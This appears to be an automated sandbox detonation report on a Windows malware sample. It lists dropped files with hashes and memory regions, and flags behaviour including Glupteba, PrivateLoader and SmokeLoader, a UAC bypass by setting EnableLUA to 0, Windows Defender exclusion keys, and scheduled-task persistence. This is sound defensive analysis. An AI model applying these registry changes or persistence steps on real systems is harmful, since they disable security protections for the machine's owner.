SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

memory/2628-310-0x000000000B1B0000-0x000000000B6FD000-memory.dmp

C:\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

C:\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

memory/2912-316-0x00000000046D0000-0x0000000004FBB000-memory.dmp

\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

memory/2912-319-0x00000000042D0000-0x00000000046C8000-memory.dmp

memory/2976-325-0x0000000003930000-0x0000000003B7D000-memory.dmp

\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

memory/2912-329-0x0000000000400000-0x0000000002676000-memory.dmp

\Users\Admin\Pictures\Opera_installer_2310061406393412028.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/2032-335-0x0000000000400000-0x0000000002676000-memory.dmp

memory/1624-336-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2812-337-0x0000000000400000-0x000000000064D000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSA8DD.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

memory/2808-340-0x0000000074930000-0x000000007501E000-memory.dmp

memory/1392-341-0x00000000026D0000-0x00000000026E6000-memory.dmp

memory/2620-342-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1516-347-0x000000013F620000-0x000000013FB63000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSA8DD.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

\Users\Admin\AppData\Local\Temp\7zSA8DD.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

\Users\Admin\AppData\Local\Temp\7zSA8DD.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

C:\Users\Admin\AppData\Local\Temp\7zSA8DD.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

C:\Users\Admin\AppData\Local\Temp\7zSA8DD.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

memory/2032-355-0x0000000000400000-0x0000000002676000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2f2ac24b47308b5c481784e7bc56b6a2
SHA1 897d84370dff5b5778918ba614e971cd46ebe304
SHA256 b519aa1988efc17b07d18e2599ce4f0b7f3ecfa0b404151164f92325d6e98160
SHA512 356bc3e4b8260a70f0b58ac508edb95c3180c8e5de774656c5d122009035cea3b605fd61fe0ffadc7a6a90c5f5d720da1ad5c41570b8af8d7604ae8ee190d2d7

memory/2912-356-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2976-368-0x00000000003C0000-0x00000000003C1000-memory.dmp

memory/2976-367-0x0000000000400000-0x00000000004B2000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

\??\c:\users\admin\pictures\ptwdf3xuwcjsqwef4bnvci6u.exe

MD5 d65427c719ba3b877f1225091e14836a
SHA1 327f6a8337b52d568000ee8d63253f4ffd6cb802
SHA256 48fe5c377aabf7a268d1830c7ffc2227936cf4f4ea0ef27c8b46c9ac4af8767c
SHA512 948699d2b1c6e595bd0b89737c91d0aa5cffc9d0756a138315ed36320ce5df6aad4de7d6ecd4ea839f4af2db832fafdca0c22daa4ac29b6f003b235471065655

C:\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

memory/2592-379-0x0000000001FD0000-0x00000000026A5000-memory.dmp

memory/2196-380-0x00000000012D0000-0x00000000019A5000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

memory/2196-382-0x00000000012D0000-0x00000000019A5000-memory.dmp

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

memory/2032-396-0x0000000004030000-0x0000000004428000-memory.dmp

memory/2196-399-0x0000000000A80000-0x0000000001155000-memory.dmp

memory/2812-395-0x0000000000400000-0x000000000064D000-memory.dmp

memory/2196-383-0x0000000010000000-0x0000000010571000-memory.dmp

memory/2812-381-0x0000000000400000-0x000000000064D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

memory/2196-401-0x00000000012D0000-0x00000000019A5000-memory.dmp

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

memory/3052-402-0x0000000000400000-0x000000000064D000-memory.dmp

memory/2032-407-0x0000000004430000-0x0000000004D1B000-memory.dmp

memory/2976-408-0x0000000003930000-0x0000000003B7D000-memory.dmp

memory/2912-412-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2028-413-0x0000000000940000-0x0000000000E8D000-memory.dmp

memory/1568-414-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/1568-419-0x0000000002350000-0x0000000002358000-memory.dmp

memory/1568-429-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/1516-430-0x000000013F620000-0x000000013FB63000-memory.dmp

memory/2032-432-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2912-433-0x0000000000400000-0x0000000002676000-memory.dmp

memory/1568-438-0x0000000002380000-0x0000000002400000-memory.dmp

memory/2808-439-0x0000000000590000-0x00000000005D0000-memory.dmp

memory/1568-440-0x0000000002380000-0x0000000002400000-memory.dmp

memory/2864-442-0x0000000002770000-0x00000000028A1000-memory.dmp

memory/1568-443-0x0000000002380000-0x0000000002400000-memory.dmp

memory/2864-441-0x0000000003010000-0x0000000003181000-memory.dmp

memory/1568-437-0x0000000002380000-0x0000000002400000-memory.dmp

memory/1568-444-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

memory/2032-445-0x0000000000400000-0x0000000002676000-memory.dmp

memory/3052-447-0x0000000000400000-0x000000000064D000-memory.dmp

C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dc49d35715d084a376dafc0066a4c3f6
SHA1 e2e954b3e76e64876baff57a8bccc8a4ca7dca53
SHA256 fea8dbaffcadb209cbed605a1aca51419158f11c75571cc7797bea976a637afe
SHA512 76a420b35a2220715f5b29849df001c0dd496d2fed8666576422a0d44b04733e2b6a2bcc5b7248a2c1029b3e71b1ba4596a847312d636fc2db4b74e7037d7f9d

memory/2808-472-0x0000000000590000-0x00000000005D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\Pictures\7O8fAU20sqOYQEzFUjAPyRvu.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/1516-476-0x000000013F620000-0x000000013FB63000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

MD5 2a11bdca15f3f99d319ef86ddc187bf7
SHA1 24ec21930bed314c15543a5df6ac05c09f919ef1
SHA256 f65464cc8178573d4318c18454658712bc4d922422c3d0d5fab43d2dfe16cd9e
SHA512 b6944388601fe1c234334a58bf2ba452a5e358f08daffab2af21d55df44df387da241ca672cfa265f8b2bafad29bdf943e1b2d65dafc082fb407550580a840b1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IX3QBB0IJZYBUQYUX3RG.temp

MD5 691708329efd131118e1942745c3b125
SHA1 be5e2a08e3485fb51aea474789964d7a6073d2ec
SHA256 f22e57dbc9adb450fa17d91d8a3a3b7c285d1c2c0793a26ea1f572538e33aa3d
SHA512 97be94bc70e4e865ca4acbfc629148bdc1f83776be6b00c15663713b7ae3d2c7d6ad408acdbe3b6e33678842dc8ae73bbcbde467fe2fc11f2d17ea748ac4bd29

memory/1712-485-0x00000000026F0000-0x00000000026F8000-memory.dmp

memory/2196-484-0x00000000012D0000-0x00000000019A5000-memory.dmp

memory/1712-483-0x000000001B2B0000-0x000000001B592000-memory.dmp

memory/2912-493-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2032-495-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2436-499-0x0000000003FA0000-0x0000000004398000-memory.dmp

memory/2032-505-0x0000000000400000-0x0000000002676000-memory.dmp

memory/1968-515-0x0000000004090000-0x0000000004488000-memory.dmp

memory/2436-514-0x0000000000400000-0x0000000002676000-memory.dmp

memory/1748-516-0x000000013FDE0000-0x0000000140323000-memory.dmp

memory/1128-520-0x0000000004090000-0x0000000004488000-memory.dmp

memory/1968-534-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2976-540-0x0000000000400000-0x00000000004B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2416-586-0x0000000000230000-0x0000000000250000-memory.dmp

memory/1748-585-0x000000013FDE0000-0x0000000140323000-memory.dmp

memory/3052-587-0x0000000000400000-0x000000000064D000-memory.dmp

memory/1128-594-0x0000000000400000-0x0000000002676000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\aEedQxU.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

memory/1716-610-0x0000000140000000-0x0000000140013000-memory.dmp

memory/2416-611-0x0000000140000000-0x0000000140840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

memory/3052-616-0x0000000000400000-0x000000000064D000-memory.dmp

memory/1128-622-0x0000000000400000-0x0000000002676000-memory.dmp

memory/2416-633-0x0000000140000000-0x0000000140840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-06 14:06

Reported

2023-10-06 14:08

Platform

win10v2004-20230915-en

Max time kernel

77s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

PrivateLoader

loader privateloader

SmokeLoader

trojan backdoor smokeloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
